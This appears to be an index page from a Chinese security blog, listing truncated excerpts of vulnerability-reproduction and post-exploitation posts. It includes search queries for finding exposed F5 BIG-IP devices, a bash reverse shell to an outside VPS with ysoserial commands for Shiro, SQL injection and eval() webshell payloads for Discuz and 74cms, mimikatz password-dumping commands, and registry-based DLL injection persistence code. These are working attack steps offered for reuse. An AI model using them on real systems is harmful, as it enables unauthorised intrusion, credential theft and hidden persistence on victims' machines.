F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)复现
1、漏洞描述F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。2、影响版本F5 BIG-IP < 15.1.0.4F5 BIG-IP < 14.1.2.6F5 BIG-IP < 13.1.3.4F5 BIG-IP < 12.1.5.2F5 BIG-IP < 11.6.5.23、设备检索shodan1http.favicon.hash:-335242539 http.title:"BIG-IP® ;- Redirect"fofa1title="BIG-IP® ;- Redirect"censys1443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb7 ...
Apache Shiro反序列化远程代码执行漏洞复现
玄魂工作室大佬的文章https://mp.weixin.qq.com/s/8F5tmbJsE0SshrYK-fRl-g首先FOFA找一个环境,检测工具检测一下发现目标,开干!开启监听首先在vps运行nc 监听一个端口1nc -lvp 666列出需要使用的反弹指令1bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1将指令放到http://www.jackson-t.ca/runtime-exec-payloads.html转换成加密后的指令将指令合成为一个java的监听指令12java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 '加密后的指令'java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAta ...
Discuz!X系列全版本后台sql注入复现
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。2、将upaod放置到网站目录下,访问安装目录安装即可。0x02 漏洞复现点击站长–UCenter设置点击最下面的提交进行抓包判断列数121' order by 1 //返回正确1' order by 2 //返回错误查询当前用户11' and updatexml(1,concat(0x7e,(SELECT user())),1)-- a查询版本11' and updatexml(1,concat(0x7e,(SELECT version())),1)-- a查询数据库12345671' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)-- a //mys ...
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装0x02 复现过程当前版本v4.2.111点加工具,点击风格模板12345Payload:http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'shell地址:http://127.0.0.1/74cms/Application/Home/Conf/config.php直接访问后端代码GETSHELLhttp://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'后端代码http://127.0.0 ...
meterpreter中使用mimikatz获取windows密码
进去meterpreter后getuid一下这获得系统管理员权限开始加载mimikatz模块1load mimikatz加载成功.第一种方法:获取登录密码的hash值1msv]上面已经是得到hash值了. 下面算明文密码.获取明文密码1kerberoslook…拿到登录的明文密码了.第二种方法:使用另一种方式获取哈希值1mimikatz_command -f samdump::hashes根据上面的方式获取明文密码1mimikatz_command -f sekurlsa::searchPasswords第三种方法:Wdigest命令这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.1wdigest第四种方法:tspkg命令1tspkg总结1234567891011121314151617一、load mimikatz #加载mimikatzmsv #获取hash值kerberos #获取明文二、load mimikatz #加载mimikatzwdigest #获取系统账户信息三、load mimikatz #加载mimikatztspkg #获取系统账户信息四、l ...
CVE-2019-0708 RCE复现
漏洞环境192.168.91.136 windows7 6.1.7601192.168.91.151 kaliWindows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/复现过程1、首先升级MSF12apt-get updateapt-get install metasploit-framework2、导入脚本然后下载RCE脚本,直接将下载下载的脚本放到对应的目录下1234rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> /opt/metasploit-framework/embedded/framewor ...
后门及持久化访问4----Com组件劫持
代码及原理介绍 COM是Component Object Model(组件对象模型)的缩写,COM组件由DLL和EXE形式发布的可执行代码所组成。每个COM组件都有一个CLSID,这个CLSID是注册的时候写进注册表的,可以把这个CLSID理解为这个组件最终可以实例化的子类的一个ID。这样就可以通过查询注册表中的CLSID来找到COM组件所在的dll的名称。所以要想COM劫持,必须精心挑选CLSID,尽量选择应用范围广的CLSID。这里,我们选择的CLSID为:{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7},来实现对CAccPropServicesClass 和 MMDeviceEnumerator的劫持。系统很多正常程序启动时需要调用这两个实例。例如计算器。Dll存放的位置://%APPDATA%Microsoft/Installer/{BCDE0395-E52F-467C-8E3D-C4579291692E}接下来就是修改注册表,在指定路径添加文件,具体代码如下:12345678910111213141516171819202122232425262 ...
后门及持久化访问3----进程注入之AppInit_DLLs注册表项
进程注入之AppInit_DLLs注册表项User32.dll被加载到进程时,会获取AppInit_DLLs注册表项,若有值,则调用LoadLibrary() API加载用户DLL。只会影响加载了user32.dll的进程。1HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls代码如下:12345678910111213141516171819202122#include #include using namespace std;int test(){ HKEY hKey; DWORD dwDisposition; const char path[] = "C:\\dll.dll"; DWORD dwData = 1; RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", ...
bitsadmin windwos自带下载命令
bitsadmin的四种下载文件的方法一、1bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、1bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt三、1bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\1.txt四、123456789bitsadmin /create qianxiao996bitsadmin /addfile qianxiao996 http://qianxiao996.cn/1.txt c:\1.txtbitsadmin /resume qianxiao996bitsadmin / ...
后门及持久化访问2----进程注入之AppCertDlls 注册表项
代码及原理介绍如果有进程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec函数,那么此进程会获取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls注册表项,此项下的dll都会加载到此进程。Win7版本下没有“AppCertDlls”项,需自己创建。代码如下:1234567891011121314151617181920#include <iostream> #include <Windows.h> using namespace std;int test(){ DWORD dwDisposition; HKEY hKey; const char path[] = "C:\\dll.dll"; RegCreateKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\ ...